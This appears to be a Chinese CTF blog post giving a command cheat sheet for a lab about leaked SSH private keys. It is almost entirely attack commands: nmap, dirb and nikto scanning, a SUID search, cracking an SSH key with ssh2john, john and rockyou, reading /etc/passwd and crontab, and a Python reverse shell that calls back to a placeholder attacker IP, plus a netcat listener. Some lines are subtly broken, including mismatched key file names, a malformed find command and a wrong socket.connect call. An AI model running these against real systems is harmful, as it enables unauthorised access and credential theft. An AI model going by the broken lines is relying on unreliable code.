CTF-1

SSH私钥泄露

信息探测

对于只是给定一个对应IP地址的靶场机器,我们需要对其进行扫描,探测开放的服务。渗透其实是针对服务的漏洞探测,然后进行相应的数据包发送,获取机器的最高权限。

1
2
3
4
5
6
#挖掘开放服务信息
nmap -sV ip
#探测靶场全部信息
nmap -A -v ip
#探测靶场的操作系统类型与版本
nmap -O ip
1
2
#探测服务的隐藏文件
dirb http://ip:port
1
2
#挖掘敏感信息
nikto -host ip
1
2
#查找具有root权限的文件
find /-perm -4000 2 > /dev/null
1
2
3
4
5
6
7
8
#通过ssh私钥登录
ssh -i id_rsa user@ip
#解密ssh密钥信息
chmod 600 id_isa
#转换ssh
ssh2john id_isa > isacrack
#利用字典解密
zcat ./rockyou.txt.gz | john --pipe --rule isacrack
1
2
3
4
5
6
7
8
#查看所有用户的列表
cat /etc/passwd
#查看用户组
cat /etc/group
#查看属于某些用户的文件
find / -user username
#查看缓冲文件目录
/tmp
1
2
#挖掘定时任务
cat /etc/crontab
1
2
3
4
5
6
7
8
9
10
11
12
13
14
#反弹shell
#!/usr/bin/python
import os, subprocess, socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect("攻击机IP", "攻击机监听端口")
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
p = subprocess.call(["/bin/sh", "-i"])

#攻击机netcat命令
nc -lpv port
#查看占用端口
netstat -pantu

CTF-1
https://www.spacezxy.top/2021/12/20/CTF/CTF-1/
作者
Xavier ZXY
发布于
2021年12月20日
许可协议